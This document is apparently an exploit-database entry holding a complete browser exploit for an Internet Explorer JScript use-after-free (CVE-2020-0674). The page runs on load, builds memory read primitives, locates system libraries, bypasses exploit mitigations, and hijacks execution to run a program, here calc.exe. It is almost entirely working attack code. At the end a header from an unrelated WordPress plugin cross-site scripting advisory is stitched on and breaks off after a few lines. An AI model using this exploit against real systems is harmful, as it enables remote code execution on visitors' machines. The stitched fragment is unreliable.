# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
# Date: 2020-05-07
# Exploit Author: maxpl0it
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
# Version: IE 8, 9, 10, and 11
# Tested on: Windows 7 (x64)
# CVE : CVE-2020-0674
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
<script language="JScript.Compact">
// -------------------------------------------------------------------------------------------------
//
// Credits:
// maxpl0it (@maxpl0it) - Writing the exploit
// Qihoo 360 - Identifying the vulnerability in the wild
//
//
// Vulnerability: Use-After-Free when Array.sort() is called with a comparator function. The two
// arguments are untracked by the garbage collector.
//
// Exploit Description: This exploit was written for 64-bit IE instances.
// However, Enhanced Protected Mode sandboxing could be enabled for IE 10
// and IE 11 because EPM on Windows 7 simply enables x64 and doesn't do
// much else.
// The exploit executes C:\Windows\System32\calc.exe but doesn't implement
// any form of process continuation after execution.
//
// Testing:
// OS tested on: Windows 7
// IE versions tested on:
// 8 (x64 version)
// 9 (x64 version)
// 10 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
// 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
//
// Further notes:
// Video at https://twitter.com/maxpl0it/status/1253396942048104448
//
// The debug is better viewed in the console. Open Developer Tools and enable debug below.
//
// This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
//
// If you receive the error "Couldn't rewrite variable", verify that this is 64-bit IE and not a
// 32-bit process (iexplore.exe and not iexplore.exe *32)
//
// ------------------------------------------------------------------------------------------------------
// write_debug: Emits a debug message when the `debug` switch (declared below) is on.
// Tries console.log first (in IE the console only exists while Developer Tools is
// open) and falls back to alert(); if neither works the message is dropped.
function write_debug(str_to_write) {
  if(!debug) {
    return; // Switch is below
  }
  try {
    console.log(str_to_write); // In IE, console only works if devtools is open.
    return;
  } catch(console_err) {
    // No usable console - fall through to alert().
  }
  try {
    alert(str_to_write); // A lot of popups but provides information.
  } catch(alert_err) {
    // Otherwise, nothing.
  }
}
// Globals
// Script-level state shared by every function below. Note that loop counters and
// scratch values elsewhere (i, tmp, lower, upper, module_lower, ...) are assigned
// without `var`, so they are implicit globals as well.
var depth; // Used to track the depth of the recursion for the exploit function.
var spray; // Used to spray objects and fill GcBlocks.
var overlay; // Used to hold objects that will eventually contain properties that will reallocate freed GcBlocks.
var overlay_backup; // Used to make sure that the overlay objects still have a reference after the exploit is done. Otherwise they would be freed and reallocated.
var variants; // A string that contains a bunch of fake VAR structures. This is the property name that will cause the freed GcBlock to be reallocated.
var total; // Used to hold the untracked variable pointers for the use-after-free.
var leak_lower; // Holds the least significant DWORD of the 'next VVAL' pointer leak.
var leak_offset; // Since we don't want to free all overlay variables, this value will be used to identify which property we have got a pointer for so only this will be freed and reallocated later.
var leak_verify_var; // Used to verify that the rewrite worked. If the overlay cannot be freed and reallocated, then the exploit will not work.
var fakeobj_var; // Points at the property name string in the final VVAL. When the property name changes, a fake VAR is constructed in the name string and will change this fakeobj_var's type and object pointer values.
var trigger_obj; // Will contain the fake object and vftable.
var context; // Will store the context structure for NtContinue. (Declared here but not assigned anywhere in this script.)
var padding = "AAAAAAAAAAA"; // Padding (11 chars) aligns so that the property with the manipulated hash will end up on top of an untracked var.
var leak = "\u0005"; // This manipulates the hash of the VVAL.
var leaked_var = "A"; // The final object property name. Needs to be created so that the 'next VVAL' pointer of the manipulated hash VVAL is filled.
var spray_size = 20000; // The size of the spray array.
var overlay_size = 20000; // The size of the overlay array.
var pad_size = 3000; // The size of padding for the trigger object. This padding adds additional space for functions like WinExec() to add their stack frames and the stack frames of the functions they call.
var sort = new Array(); // The array to be sorted with the vulnerable function.
var lfh = new Array(); // An array used to trigger lfh.
var debug = false; // Whether write_debug will do anything.
var command = "\u3a43\u575c\u6e69\u6f64\u7377\u535c\u7379\u6574\u336d\u5c32\u6163\u636c\u652e\u6578"; // The command to be executed, packed two ASCII bytes per UTF-16 unit. In this case it's "C:\Windows\System32\calc.exe"
// Setup - fills the sort array with arrays to be sorted. Done first to avoid the stack setup getting messed up.
// 310 two-element arrays; initial_exploit() recurses through sort[1..151]. `i` is an implicit global.
for(i = 0; i < 310; i++) sort[i] = [0, 0];
// lfh_trigger: Used to trigger LFH for a particular size.
// Creates 50 objects, each with one 569-character property name, and keeps them
// alive in the global `lfh` array. `tmp` and `i` are implicit globals.
function lfh_trigger() {
  for(i = 0; i < 50; i++) {
    tmp = new Object();
    tmp[Array(570).join('A')] = 1; // Array(570).join('A') yields 569 'A's
    lfh.push(tmp);
  }
}
// reset: Resets the objects used in the function initial_exploit so it could be used again.
// Clears depth/spray/overlay/total, allocates overlay_size then spray_size empty
// objects (in that order), then forces a garbage collection.
function reset() {
  depth = 0;
  spray = new Array();
  overlay = new Array();
  total = new Array();
  for(i = 0; i < overlay_size; i++) overlay[i] = new Object(); // Overlay must happen before spray
  for(i = 0; i < spray_size; i++) spray[i] = new Object();
  CollectGarbage(); // JScript/IE-specific: forces a GC pass
}
// make_variant: Creates a fake VAR in a string.
// Returns a 12-unit UTF-16 string: [type, 0, 0, 0], then the 64-bit obj_ptr and the
// 64-bit next_ptr, each split into four 16-bit units, least significant first.
// Missing pointer arguments coerce to 0 through the bitwise operators.
function make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
  var low_half = function(dword) { return dword & 0xffff; };
  var high_half = function(dword) { return (dword >> 16) & 0xffff; };
  var split_qword = function(lower, upper) {
    return [low_half(lower), high_half(lower), low_half(upper), high_half(upper)];
  };
  var units = [type, 0, 0, 0]
    .concat(split_qword(obj_ptr_lower, obj_ptr_upper))
    .concat(split_qword(next_ptr_lower, next_ptr_upper));
  return String.fromCharCode.apply(null, units);
}
// set_variants: A wrapper for make_variant that allocates and pads the property names to align the fake VARs correctly in memory.
// Writes the global `variants`: 8 'A's, 46 fake VARs (12 UTF-16 units each), then 9 'A's.
function set_variants(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
  variants = "AAAAAAAA"; // 8-character leading pad
  for(i=0; i < 46; i++) { // `i` is an implicit global
    variants += make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper);
  }
  variants += "AAAAAAAAA"; // 9-character trailing pad
}
// initial_exploit: The main exploit function.
// Comparator passed to Array.sort(). Each level replaces its two parameters (described
// in the header comment as untracked by the GC) with objects from `spray`, then recurses
// by sorting the next `sort` entry. Past depth 150 the spray is dropped and collected,
// the four property names are added to every overlay object, and the parameters are
// pushed into `total` on the way back out. Always returns 0.
function initial_exploit(untracked_1, untracked_2) {
  untracked_1 = spray[depth*2];
  untracked_2 = spray[depth*2 + 1];
  if(depth > 150) {
    spray = new Array(); // Erase spray
    CollectGarbage(); // Add to free
    for(i = 0; i < overlay_size; i++) {
      overlay[i][variants] = 1;
      overlay[i][padding] = 1;
      overlay[i][leak] = 1;
      overlay[i][leaked_var] = i; // Used to identify which leak is being used
    }
    total.push(untracked_1);
    total.push(untracked_2);
    return 0;
  }
  // Set pointers
  depth += 1;
  sort[depth].sort(initial_exploit); // Recurse one level deeper
  total.push(untracked_1);
  total.push(untracked_2);
  return 0;
}
// rewrite: Frees the correct overlay object and reallocate over it as to replace the object at the leaked 'next property' pointer.
// v: the property name (string) given to the replacement object last.
// i: the value stored under that name. Both may be undefined (several callers pass fewer arguments).
function rewrite(v, i){
  CollectGarbage(); // Get rid of anything lingering that might screw up the exploit
  overlay_backup[leak_offset] = null; // Erase the object to be replaced
  CollectGarbage(); // Clear leak
  overlay_backup[leak_offset] = new Object(); // New object - Might end up in the same slot as the last object
  overlay_backup[leak_offset][variants] = 1; // Re-allocate the newly freed location (Take up the original GcBlock location again)
  overlay_backup[leak_offset][padding] = 1; // Add padding to align the hash with the type to leak the 'next property' pointer
  overlay_backup[leak_offset][leak] = 1; // The hash-manipulating property
  overlay_backup[leak_offset][v] = i; // sets the property name and the initial VAR
}
// read_pointer: Rewrites the property and changes the fakeobj_var variable to a string at a specified location. This sets up the read primitive.
// Only type (8) and obj_ptr are passed to make_variant, so the next_ptr fields are 0.
// `o` is forwarded to rewrite() as the stored value.
function read_pointer(addr_lower, addr_higher, o) {
  rewrite(make_variant(8, addr_lower, addr_higher), o);
}
// read_byte: Reads the byte at the address using the length of the BSTR.
// Returns an integer 0-255. test_read() calls this with a single argument, leaving
// addr_higher and o undefined.
function read_byte(addr_lower, addr_higher, o) {
  read_pointer(addr_lower + 2, addr_higher, o); // Use the length. However, when the length is found, it is divided by 2 (BSTR_LENGTH >> 1) so changing this offset allows us to read a byte properly.
  return (fakeobj_var.length >> 15) & 0xff; // Shift to align and get the byte.
}
// read_word: Reads the WORD (2 bytes) at the specified address.
// Same length trick as read_byte; the two bytes are taken from bits 15-22 and 23-30 of
// fakeobj_var.length and recombined little-endian. Returns an integer 0-65535.
function read_word(addr_lower, addr_higher, o) {
  read_pointer(addr_lower + 2, addr_higher, o);
  return ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
}
// read_dword: Reads the DWORD (4 bytes) at the specified address.
// Two read_pointer() calls at +2 and +4, each yielding 16 bits via fakeobj_var.length.
// `lower` and `upper` are assigned without `var` (implicit globals). Because
// `upper << 16` is a signed 32-bit operation the result may be negative.
function read_dword(addr_lower, addr_higher, o) {
  read_pointer(addr_lower + 2, addr_higher, o);
  lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  read_pointer(addr_lower + 4, addr_higher, o);
  upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  return lower + (upper << 16);
}
// read_qword: Reads the QWORD (8 bytes) at the specified address.
// Four 16-bit reads at +2, +4, +6, +8; returns {'lower': low DWORD, 'upper': high DWORD},
// each built like read_dword (so either half may be negative). The four intermediates
// are implicit globals.
function read_qword(addr_lower, addr_higher, o) {
  // Lower
  read_pointer(addr_lower + 2, addr_higher, o);
  lower_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  read_pointer(addr_lower + 4, addr_higher, o);
  lower_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  // Upper
  read_pointer(addr_lower + 6, addr_higher, o);
  upper_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  read_pointer(addr_lower + 8, addr_higher, o);
  upper_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
  return {'lower': lower_lower + (lower_upper << 16), 'upper': upper_lower + (upper_upper << 16)};
}
// test_read: Used to test whether the arbitrary read works. leak_lower + 64 points to the fakeobj_var location (property name string). The byte at this address is therefore expected to be 8 (String VAR type).
// Throws if the byte read back is anything other than 8.
function test_read() {
  var type_byte = read_byte(leak_lower + 64); // addr_higher and o are deliberately left undefined
  if(type_byte == 8) {
    return;
  }
  throw Error("Arbitrary read failed.");
}
// test_fakeobj: Used to test whether fakeobj_var responds as expected when the type and value is changed.
// Rewrites the property name as a type-3 VAR holding 23 and throws unless fakeobj_var
// stringifies to "23".
function test_fakeobj() {
  rewrite(make_variant(3, 23));
  var as_text = fakeobj_var + ""; // Turning it to a string causes the conversion to copy, dereferencing the 0x80 type. Type 0x80 being used directly won't work.
  if(as_text == 23) {
    return;
  }
  throw Error("Couldn't re-write fakeobj variable");
}
// test_rewrite: Used to test whether the VAR in the VVAL leaked address changes as expected.
// Rewrites the property under the original name with the value 23 and throws unless
// leak_verify_var now stringifies to "23".
function test_rewrite() {
  rewrite(leaked_var, 23);
  var as_text = leak_verify_var + "";
  if(as_text == 23) {
    return;
  }
  throw Error("Couldn't re-write variable");
}
// addrof: The 'address-of' primitive. Changes the VAR at the start of the VVAL to point to a given object and changes the fakeobj_var string to point to the object pointer of this VAR, thus allowing the address to be read.
// Returns only the low 32 bits of the object pointer (read_dword); callers pass 0 as
// the upper half. `var_addr` is an implicit global.
function addrof(o) {
  var_addr = read_dword(leak_lower + 8, 0, o); // Dereference the first VAR
  return read_dword(var_addr + 8, 0, 1); // Get the Object pointer of the second VAR
}
// find_module_base: Finds the base of a module from a leaked pointer. Works by zeroing the least significant 16 bits of the address and subtracting 0x10000 until the DOS stub code is found at a specified offset.
// Mutates and returns the `ptr` object ({lower, upper}) it is given. The loop has no
// exit other than a match, so an unreadable range would fail inside read_dword rather
// than here.
function find_module_base(ptr) {
  ptr.lower = (ptr.lower & 0xFFFF0000) + 0x4e; // Set to starting search point (0x4e into the 64 KiB-aligned candidate)
  while(true) {
    if(read_dword(ptr.lower, ptr.upper) == 0x73696854) { // The string 'This' (little-endian dword)
      write_debug("[+] Found module base!");
      ptr.lower -= 0x4e; // Subtract the offset to get the base
      return ptr;
    }
    ptr.lower -= 0x10000; // Step back one 0x10000-byte boundary
  }
}
// leak_jscript_base: Gets the base of the jscript module by creating a new object, following the object pointers until the vftable is found, and then using the vftable leak to identify the base of jscript.dll.
// Returns the {lower, upper} base from find_module_base. `obj`, `obj_ptr_addr` and
// `vftable_addr` are implicit globals.
function leak_jscript_base() {
  // Create an object to leak vftable
  obj = new Object();
  // Get address of the object pointer
  obj_ptr_addr = addrof(obj);
  write_debug("[+] Object ptr at 0x" + obj_ptr_addr.toString(16));
  // Get address of the vftable (first QWORD of the object)
  vftable_addr = read_qword(obj_ptr_addr, 0, 1);
  write_debug("[+] Vftable at upper 0x" + vftable_addr.upper.toString(16) + " and lower 0x" + vftable_addr.lower.toString(16));
  return find_module_base(vftable_addr);
}
// leak_var: Executes the main exploit function in order to leak a 'next property' pointer.
// Sets the globals overlay_backup and leak_lower. leak_lower stays undefined if no
// non-integer number is found in `total`.
function leak_var() {
  reset();
  variants = Array(570).join('A'); // Create the variants (569 'A's)
  sort[depth].sort(initial_exploit); // Exploit
  overlay_backup = overlay; // Prevent it from being freed and losing our leaked pointer
  leak_lower = undefined;
  for(i = 0; i < total.length; i++) {
    if(typeof total[i] === "number" && total[i] % 1 != 0) { // Only a non-integer double is treated as the leak
      leak_lower = (total[i] / 4.9406564584124654E-324); // This division just converts the float into an easy-to-read 32-bit number
      break;
    }
  }
}
// get_rewrite_offset: Executes the main exploit function again in order to create a number of fake VARs that point to the leaked location. This means that the object pointer can be read and the exact offset of the leaked property in the overlay array can be identified.
// Sets the globals leak_offset (as an integer) and leak_verify_var from the first
// numeric entry of `total`; both stay unchanged if none is found.
function get_rewrite_offset() {
  reset();
  set_variants(0x80, leak_lower); // Find the number of the object (obj_ptr_upper/next_ptr left undefined -> 0)
  sort[depth].sort(initial_exploit); // Exploit
  for(i = 0; i < total.length; i++) {
    if(typeof total[i] === "number") {
      leak_offset = parseInt(total[i] + ""); // Stringify then parse to drop any fractional part
      leak_verify_var = total[i];
      break;
    }
  }
}
// get_fakeobj: Identifies the fakeobj_var.
// Sets the global fakeobj_var to the entry of `total` that stringifies to "1234";
// leaves it unchanged if none does.
function get_fakeobj() {
  rewrite(make_variant(3, 1234)); // Turn the name of the property into a variant (type 3, value 1234)
  reset();
  set_variants(0x80, leak_lower + 64); // Create a fake VAR pointing to the name of the property
  sort[depth].sort(initial_exploit); // Exploit
  for(i = 0; i < total.length; i++) {
    if(typeof total[i] === "number") {
      if(total[i] + "" == 1234) { // Loose comparison of the stringified value
        fakeobj_var = total[i];
        break;
      }
    }
  }
}
// leak_module: Used to leak a pointer for a given module that is imported by another module by traversing the PE structure in-memory.
// base: {lower, upper} of the importing module. target_name_lower/upper: the first 8
// bytes of the imported DLL's name as two little-endian dwords (see the calls in main()).
// Returns the {lower, upper} read from the target's IAT entry, or undefined if the
// import table is exhausted without a match. All working variables are implicit globals.
function leak_module(base, target_name_lower, target_name_upper) {
  // Get IMAGE_NT_HEADERS pointer
  module_lower = base.lower + 0x3c; // PE Header offset location
  module_upper = base.upper;
  file_addr = read_dword(module_lower, module_upper, 1);
  write_debug("[+] PE Header offset = 0x" + file_addr.toString(16));
  // Get imports
  module_lower = base.lower + file_addr + 0x90; // Import Directory offset location
  import_dir = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Import offset = 0x" + import_dir.toString(16));
  // Get import size
  module_lower = base.lower + file_addr + 0x94; // Import Directory size location
  import_size = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Size of imports = 0x" + import_size.toString(16));
  // Find module
  module_lower = base.lower + import_dir;
  while(import_size != 0) {
    name_ptr = read_dword(module_lower + 0xc, module_upper, 1); // 0xc is the offset to the module name pointer
    if(name_ptr == 0) {
      throw Error("Couldn't find the target module name");
    }
    name_lower = read_dword(base.lower + name_ptr, base.upper);
    name_upper = read_dword(base.lower + name_ptr + 4, base.upper);
    if(name_lower == target_name_lower && name_upper == target_name_upper) {
      write_debug("[+] Found the module! Leaking a random module pointer...");
      iat = read_dword(module_lower + 0x10, module_upper); // Import Address Table
      leaked_address = read_qword(base.lower + iat + 8, base.upper); // +8 since __imp___C_specific_handler can cause issues when imported in some jscript instances
      write_debug("[+] Leaked address at upper 0x" + leaked_address.upper.toString(16) + " and lower 0x" + leaked_address.lower.toString(16));
      return leaked_address;
    }
    import_size -= 0x14; // The size of each entry
    module_lower += 0x14; // Increase entry pointer
  }
}
// leak_export: Finds the location of a given exported function in a module. Works using binary search in order to speed it up. Assumes that the export name order is alphabetical.
// base: {lower, upper} of the module. target_name_first..fourth: the first 16 bytes of
// the export name as little-endian dwords, 0 for unused parts (see the calls in main()).
// Returns {lower, upper} of the export or throws. All working variables are implicit
// globals. compare_nums() may return undefined (see its comment); `!res` treats that
// as "equal".
function leak_export(base, target_name_first, target_name_second, target_name_third, target_name_fourth) {
  // Get IMAGE_NT_HEADERS pointer
  module_lower = base.lower + 0x3c; // PE Header offset location
  module_upper = base.upper;
  file_addr = read_dword(module_lower, module_upper, 1);
  write_debug("[+] PE Header offset at 0x" + file_addr.toString(16));
  // Get exports
  module_lower = base.lower + file_addr + 0x88; // Export Directory offset location
  export_dir = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Export offset at 0x" + import_dir.toString(16)); // NOTE: prints the global import_dir left by leak_module, not export_dir; debug output only
  // Get the number of exports
  module_lower = base.lower + export_dir + 0x14; // Number of items offset
  export_num = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Export count is " + export_num);
  // Get the address offset
  module_lower = base.lower + export_dir + 0x1c; // Address offset
  addresses = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Export address offset at 0x" + addresses.toString(16));
  // Get the names offset
  module_lower = base.lower + export_dir + 0x20; // Names offset
  names = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Export names offset at 0x" + names.toString(16));
  // Get the ordinals offset
  module_lower = base.lower + export_dir + 0x24; // Ordinals offset
  ordinals = read_dword(module_lower, module_upper, 1);
  write_debug("[+] Export ordinals offset at 0x" + ordinals.toString(16));
  // Binary search because linear search is too slow
  upper_limit = export_num; // Largest number in search space
  lower_limit = 0; // Smallest number in search space
  num_pointer = Math.floor(export_num/2);
  module_lower = base.lower + names;
  search_complete = false; // Never set to true; the loop only exits via return or throw
  while(!search_complete) {
    module_lower = base.lower + names + 4*num_pointer; // Point to the name string offset
    function_str_offset = read_dword(module_lower, module_upper, 0); // Get the offset to the name string
    module_lower = base.lower + function_str_offset; // Point to the string
    function_str_lower = read_dword(module_lower, module_upper, 0); // Get the first 4 bytes of the string
    res = compare_nums(target_name_first, function_str_lower);
    if(!res && target_name_second) { // First 4 bytes matched and a second part was supplied
      function_str_second = read_dword(module_lower + 4, module_upper, 0); // Get the next 4 bytes of the string
      res = compare_nums(target_name_second, function_str_second);
      if(!res && target_name_third) {
        function_str_third = read_dword(module_lower + 8, module_upper, 0); // Get the next 4 bytes of the string
        res = compare_nums(target_name_third, function_str_third);
        if(!res && target_name_fourth) {
          function_str_fourth = read_dword(module_lower + 12, module_upper, 0); // Get the next 4 bytes of the string
          res = compare_nums(target_name_fourth, function_str_fourth);
        }
      }
    }
    if(!res) { // equal
      module_lower = base.lower + ordinals + 2*num_pointer;
      ordinal = read_word(module_lower, module_upper, 0);
      module_lower = base.lower + addresses + 4*ordinal;
      function_offset = read_dword(module_lower, module_upper, 0);
      write_debug("[+] Found target export at offset 0x" + function_offset.toString(16));
      return {'lower': base.lower + function_offset, 'upper': base.upper};
    }
    if(res == 1) { // current name sorts after the target: search the lower half
      if(upper_limit == num_pointer) {
        throw Error("Failed to find the target export.");
      }
      upper_limit = num_pointer;
      num_pointer = Math.floor((num_pointer + lower_limit) / 2);
    } else { // target sorts after the current name: search the upper half
      if(lower_limit == num_pointer) {
        throw Error("Failed to find the target export.");
      }
      lower_limit = num_pointer;
      num_pointer = Math.floor((num_pointer + upper_limit) / 2);
    }
    if(num_pointer == upper_limit && num_pointer == lower_limit) {
      throw Error("Failed to find the target export.");
    }
  }
  throw Error("Failed to find matching export."); // Unreachable while search_complete stays false
}
// compare_nums: Compares two numbers that represent 4-byte strings for equality. If not, it detects which character is larger or smaller.
// Returns 0 when equal, -1 when the target's first differing byte is greater, 1 when the
// current's is greater. Bytes are compared least-significant first. If a zero byte is
// reached in either value before a difference is found, the function falls off the end
// and returns undefined.
function compare_nums(target, current) {
  write_debug("[*] Comparing 0x" + target.toString(16) + " and 0x" + current.toString(16));
  if(target == current) {
    write_debug("[+] Equal!");
    return 0;
  }
  var remaining_target = target;
  var remaining_current = current;
  while(remaining_target != 0 && remaining_current != 0) {
    var target_byte = remaining_target & 0xff;
    var current_byte = remaining_current & 0xff;
    if(target_byte > current_byte) {
      return -1;
    }
    if(target_byte < current_byte) {
      return 1;
    }
    remaining_target = remaining_target >> 8;
    remaining_current = remaining_current >> 8;
  }
}
// generate_gadget_string: Takes a gadget address and creates a string from it.
// gadget is {lower, upper}; the result is four UTF-16 units holding the 64-bit value
// least-significant 16 bits first.
function generate_gadget_string(gadget) {
  var lo = gadget.lower;
  var hi = gadget.upper;
  var units = [lo & 0xffff, (lo >> 16) & 0xffff, hi & 0xffff, (hi >> 16) & 0xffff];
  return String.fromCharCode(units[0], units[1], units[2], units[3]);
}
// generate_obj_vftable: Creates a fake object with a fake vftable containing a few ROP gadgets.
// initial_jmp: {lower, upper} written as the last 4 UTF-16 units of the string.
// Sets the global trigger_obj and returns its address via string_addr();
// `trigger_addr` is an implicit global.
function generate_obj_vftable(initial_jmp) {
  trigger_obj = Array(pad_size + 1).join('A'); // Adds lots of stack space to either side to prevent msvcrt.dll crashing (pad_size 'A's)
  trigger_obj = trigger_obj + Array(157).join('A') + generate_gadget_string(initial_jmp); // 156 more 'A's, then the 4-unit address
  trigger_obj = trigger_obj.substr(0, trigger_obj.length); // Same content; presumably forces a fresh flat copy - TODO confirm
  trigger_addr = string_addr(trigger_obj);
  write_debug("[+] Trigger object at 0x" + trigger_addr.upper.toString(16) + " 0x" + trigger_addr.lower.toString(16));
  return trigger_addr;
}
// generate_context: Creates a partial fake CONTEXT structure to use with NtContinue. P1Home and P2Home are missing because this structure is a part of the fake object. This means that no stack pivot is needed for execution of this exploit. The leaked stack pointer is also used to protect against stack pivot detection.
// All three parameters are {lower, upper} pairs serialised with generate_gadget_string.
// Each 64-bit field is four UTF-16 units; the segment/flags fields are packed two
// bytes per unit, as labelled below. Returns the concatenated string.
function generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export) {
  return "\u0000\u0000\u0000\u0000" + // P3Home
  "\u0000\u0000\u0000\u0000" + // P4Home
  "\u0000\u0000\u0000\u0000" + // P5Home
  "\u0000\u0000\u0000\u0000" + // P6Home
  "\u0003\u0010" + // ContextFlags
  "\u0000\u0000" + // MxCsr
  "\u0033" + // SegCs
  "\u0000" + // SegDs
  "\u0000" + // SegEs
  "\u0000" + // SegFs
  "\u0000" + // SegGs
  "\u002b" + // SegSs
  "\u0246\u0000" + // EFlags
  "\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too!
  "\u0000\u0000\u0000\u0000" + // Dr1
  "\u0000\u0000\u0000\u0000" + // Dr2
  "\u0000\u0000\u0000\u0000" + // Dr3
  "\u0000\u0000\u0000\u0000" + // Dr6
  "\u0000\u0000\u0000\u0000" + // Dr7
  "\u0000\u0000\u0000\u0000" + // Rax
  generate_gadget_string(command_address) + // Rcx - Command pointer
  "\u0000\u0000\u0000\u0000" + // Rdx - SW_HIDE
  "\u0000\u0000\u0000\u0000" + // Rbx
  generate_gadget_string(leaked_stack_ptr) + // Rsp - Leaked Stack pointer
  "\u0000\u0000\u0000\u0000" + // Rbp
  "\u0000\u0000\u0000\u0000" + // Rsi
  "\u0000\u0000\u0000\u0000" + // Rdi
  "\u0040\u0000\u0000\u0000" + // R8
  "\u0000\u0000\u0000\u0000" + // R9
  "\u0000\u0000\u0000\u0000" + // R10
  "\u0000\u0000\u0000\u0000" + // R11
  "\u0000\u0000\u0000\u0000" + // R12
  "\u0000\u0000\u0000\u0000" + // R13
  "\u0000\u0000\u0000\u0000" + // R14
  "\u0000\u0000\u0000\u0000" + // R15
  generate_gadget_string(kernel32_winexec_export); // Rip - WinExec() call
}
// trigger_exec: Triggers code execution by creating a fake VAR of type 0x81, setting it's vftable to the payload, and causing execution by using typeof.
// The rewrite value (second argument of rewrite) is left undefined. The final
// `typeof fakeobj_var;` is an expression statement evaluated only for its side effect.
function trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export) {
  rewrite(make_variant(0x81, leak_lower + 96, 0) + make_variant(0, obj_addr.lower + 2 * (pad_size), 0) + generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export));
  write_debug("[*] About to trigger...");
  typeof fakeobj_var;
}
// leak_stack_ptr: Leaks a stack pointer in order to avoid stack pivot detection in the CONTEXT structure.
// Returns {lower, upper}. The offsets 24, 80 and 84 are hard-coded for the tested
// builds (see the header comment). leak_obj, obj_addr, csession_addr and the two
// stack_addr_* values are implicit globals.
function leak_stack_ptr() {
  leak_obj = new Object(); // Create an object
  obj_addr = addrof(leak_obj); // Get address
  csession_addr = read_dword(obj_addr + 24, 0, 1); // Get CSession from offset 24
  stack_addr_lower = read_dword(csession_addr + 80, 0, 1); // Get the lower half of the stack pointer from offset 80
  stack_addr_upper = read_dword(csession_addr + 84, 0, 1); // Get the upper half of the stack pointer from offset 84
  return {'lower': stack_addr_lower, 'upper': stack_addr_upper};
}
// string_addr: Gets the address of a string in an object that can be used in a chain.
// Returns {lower, upper} with the low 32 bits from addrof() and upper fixed to 0.
function string_addr(string_to_get) {
  var location = new Object();
  location.lower = addrof(string_to_get);
  location.upper = 0;
  return location;
}
// main: The entire exploit.
// Runs the stages in order: heap preparation, pointer leak, rewrite/fakeobj/read
// self-tests (each throws on failure), module base discovery via import tables,
// export lookup, then context construction and trigger. Every intermediate is an
// implicit global. No return value; invoked once at script load below.
function main(){
  // Setup functions
  lfh_trigger(); // Trigger LFH - May or may not make the exploit more reliable, but can't hurt
  // Leak VAR
  leak_var();
  // Identify offset for reliable rewrite
  get_rewrite_offset();
  // Test rewrite
  test_rewrite();
  // Create a fake VAR
  get_fakeobj();
  // Test fakeobj rewrite
  test_fakeobj();
  // Output results so far
  write_debug("[+] Leaked address 0x" + leak_lower.toString(16) + " is at offset " + leak_offset);
  // Test read
  test_read();
  // Get the module base for jscript
  jscript_base = leak_jscript_base();
  // Get the msvcrt base by following the jscript import table ("msvc", "rt.d" as little-endian dwords)
  mscvcrt_leak = leak_module(jscript_base, 0x6376736d, 0x642e7472);
  msvcrt_base = find_module_base(mscvcrt_leak);
  write_debug("[+] Found msvcrt base at 0x" + msvcrt_base.upper.toString(16) + " 0x" + msvcrt_base.lower.toString(16));
  // Get the ntdll base by following the msvcrt import table ("ntdl", "l.dl")
  ntdll_leak = leak_module(msvcrt_base, 0x6c64746e, 0x6c642e6c);
  ntdll_base = find_module_base(ntdll_leak);
  write_debug("[+] Found ntdll at 0x" + ntdll_base.upper.toString(16) + " 0x" + ntdll_base.lower.toString(16));
  // Get the kernel32 base by following the jscript import table ("KERN", "EL32")
  kernel32_leak = leak_module(jscript_base, 0x4e52454b, 0x32334c45);
  kernel32_base = find_module_base(kernel32_leak);
  write_debug("[+] Found kernel32 at 0x" + kernel32_base.upper.toString(16) + " 0x" + kernel32_base.lower.toString(16));
  // Find the WinExec function address from kernel32 (only the first 4 bytes "WinE" are matched)
  kernel32_winexec_export = leak_export(kernel32_base, 0x456e6957, 0, 0, 0);
  write_debug("[+] Found WinExec at 0x" + kernel32_winexec_export.upper.toString(16) + " 0x" + kernel32_winexec_export.lower.toString(16));
  // Find the NtContinue function address from ntdll ("NtCo", "ntin")
  ntdll_ntcontinue_export = leak_export(ntdll_base, 0x6f43744e, 0x6e69746e, 0, 0);
  write_debug("[+] Found NtContinue at 0x" + ntdll_ntcontinue_export.upper.toString(16) + " 0x" + ntdll_ntcontinue_export.lower.toString(16));
  // Get the address of the command to be executed
  command_address = string_addr(command);
  // Leak the stack pointer
  leaked_stack_ptr = leak_stack_ptr();
  // Create fake object and vftable
  obj_addr = generate_obj_vftable(ntdll_ntcontinue_export);
  // Generate context and trigger code execution
  trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export);
}
// Entry point: invoke main(), whose definition closes on the line above.
main();
</script>
</head>
</html>
# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-13
# Vendor Homepage: https://wordpress.org/plugins/buddypress/
# Version: 6.2.0
Document Title:
===============
Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability
References (Source):
====================
